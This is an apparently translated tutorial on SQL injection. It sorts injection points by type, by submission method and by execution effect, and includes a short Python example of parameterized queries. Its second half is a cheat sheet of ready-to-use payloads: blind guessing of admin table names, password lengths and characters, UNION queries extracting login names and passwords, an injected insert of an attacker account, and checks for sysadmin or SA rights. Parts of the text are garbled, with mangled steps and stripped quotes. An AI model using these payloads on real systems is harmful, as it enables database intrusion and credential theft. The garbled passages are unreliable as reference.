
What are the three kinds of SQL injection statements?

2025-03-31 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31

This article introduces the three kinds of SQL injection statements. It is detailed and has some reference value; interested readers should read it through.

There are three kinds of SQL injection statements: 1, numeric injection point, such as "select * from table name where id=1 and 1=1"; 2, character injection point, such as "select * from table name where name..."; 3, search injection point.

Common SQL injection statements

SQL injection

1. What is SQL injection

SQL injection means inserting SQL commands into a Web form submission, or into the query string of a domain name or page request, so that the server is deceived into executing malicious SQL commands.

2. SQL injection types

Classify according to the injection point type

(1) Numeric injection point

Many web page links have a structure like http://xxx.com/users.php?id=1. Injection through this form is generally called a numeric injection point, because the injection point id is of numeric type. Most web pages, such as those for viewing a user's personal information or viewing an article, use this structure to pass an id or similar value to the back end, which queries the corresponding record in the database and returns it to the front end. The prototype of this kind of SQL statement is roughly:

    select * from table name where id=1

If the point is injectable, a statement like the following can be constructed to test it:

    select * from table name where id=1 and 1=1

(2) Character injection point

Web page links of this kind have a structure like http://xxx.com/users.php?name=admin. The injection point name is of character type, so it is called a character injection point. The prototype of this type of SQL statement is roughly:

    select * from table name where name='admin'

Note that, compared with the numeric prototype, there are additional quotation marks, which can be single or double. If the point is injectable, a statement like the following can be constructed:

    select * from table name where name='admin' and 1=1 '

We need to get rid of these annoying quotes.

(3) Search injection point

This is a special type of injection. It arises when the search parameters are not filtered during a data search. Generally the link address contains "keyword=keywords"; in some cases the parameter is not shown in the link address and is submitted directly through the search box form. The prototype of the SQL statement behind this kind of injection point is roughly:

    select * from table name where field like '%keyword%'

If the point is injectable, a statement like the following can be constructed to test it:

    select * from table name where field like '%test%' and '%1%'='%1%'
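As an added example (not part of the original article), the Python code below uses the standard sqlite3 module to put the numeric prototype built by string concatenation next to bound-parameter versions of all three injection point types. The users table, its columns and the sample rows are constructed for the example.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, bio TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "site owner"), (2, "bob", "100% test account")])
    return db

def by_id_concat(db, raw_id):
    # Prototype as the article describes it: the parameter is pasted into
    # the SQL text, so "and 1=1" / "and 1=2" become part of the WHERE clause.
    return db.execute("SELECT name FROM users WHERE id=" + raw_id).fetchall()

def by_id_bound(db, raw_id):
    # Numeric injection point: enforce the type first, then bind the value.
    try:
        user_id = int(raw_id)
    except ValueError:
        return []
    return db.execute("SELECT name FROM users WHERE id=?", (user_id,)).fetchall()

def by_name_bound(db, raw_name):
    # Character injection point: the driver passes the string as a value,
    # so quotes inside it never terminate the SQL literal.
    return db.execute("SELECT id FROM users WHERE name=?", (raw_name,)).fetchall()

def search_bound(db, keyword):
    # Search injection point: bind the pattern and escape the LIKE
    # wildcards so % and _ typed by the user match literally.
    esc = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return db.execute("SELECT name FROM users WHERE bio LIKE ? ESCAPE '\\'",
                      ("%" + esc + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # Concatenated query: the two tests give different pages (a Boolean signal).
    print(by_id_concat(db, "1 and 1=1"), by_id_concat(db, "1 and 1=2"))
    # Bound queries: the same input is treated only as data.
    print(by_id_bound(db, "1 and 1=1"), by_name_bound(db, "admin' and 1=1 '"))
    print(search_bound(db, "%"))
```

With the concatenated query the two test inputs produce different results, which is the signal Boolean-based blind injection relies on; with bound parameters both inputs return nothing.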

Classify according to the way the data is submitted

(1) GET injection

The data is submitted with GET, and the injection point is in the GET parameters. For example, in the link http://xxx.com/news.php?id=1, id is the injection point.

(2) POST injection

The data is submitted with POST, and the injection point is in the POST data. This often occurs in forms.

(3) Cookie injection

The HTTP request carries the client's Cookie, and the injection point is in a field of the Cookie.

(4) HTTP header injection

The injection point is in a field of the HTTP request header, for example the User-Agent field. Strictly speaking, Cookie injection is also a form of header injection, because the Cookie is a header field of the HTTP request.

Classify according to the effect of execution

(1) Boolean-based blind injection

That is, you can judge whether the condition is true or false according to the return page.

(2) time-based blind injection

That is, nothing can be judged from the content the page returns, so a conditional statement is used to see whether a time-delay statement is executed (that is, whether the page's response time increases).

(3) Error-based injection

That is, the page returns an error message, or the result of the injected statement is returned directly in the page.

Single quotation mark

Double quotation marks

Based on numeric injection

(4) Union query injection

Injection that applies where union can be used.

Common statements

1. Determine whether there is an injection point

    ; and 1 and 1 2

2. Guess the table. Table names are generally nothing more than admin, adminuser, user, pass, password and so on.

    and 0 (select count(*) from *)
    and 0 (select count(*) from admin) - determine whether the table admin exists

3. Guess the number of accounts. If you encounter 0 < return the correct page 1 password field name password) > 0)

5. Guess the length of each field. To guess the length, change the > 0 until the correct page is returned.

    and 1=(select count(*) from admin where len(*)>0)
    and 1=(select count(*) from admin where len(name)>6)        error
    and 1=(select count(*) from admin where len(name)>5)        correct, the length is 6
    and 1=(select count(*) from admin where len(name)=6)        correct
    and 1=(select count(*) from admin where len(password)>11)   correct
    and 1=(select count(*) from admin where len(password)>12)   error, the length is 12
    and 1=(select count(*) from admin where len(password)=12)   correct

6. Guess the characters

    and 1=(select count(*) from admin where left(name,1)=a) - guess the first character of the user account
    and 1=(select count(*) from admin where left(name,2)=ab) - guess the second character of the user account

Add one character at a time in this way; once you have guessed as many characters as the length found above, the account is known.

    and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -

This statement can guess Chinese user names and passwords. Just change the number at the end to the ASCII code of the Chinese character, and finally convert the result into characters.

    group by users.id having 1=1--
    group by users.id, users.username, users.password, users.privs having 1=1--
    ; insert into users values (666, attacker, foobar, 0xffff)--
    UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
    UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN (login_id)-
    UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN (login_id, login_name)-
    UNION SELECT TOP 1 login_name FROM logintable-
    UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

Check the server's patches = an error means the SP4 patch is applied

    and 1=(select @@VERSION)-

Check the permissions of the database connection account. A normal response proves the server role sysadmin permission.

    and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-

Determine the database connection account. (A normal response when connecting with the SA account = proof that the connection account is SA)

    and sa=(SELECT System_user)--
    and user_name()=dbo--
    and 0 (select user_name()--

The above is all the content of the article "What are the three kinds of SQL injection statements?" Thank you for reading!
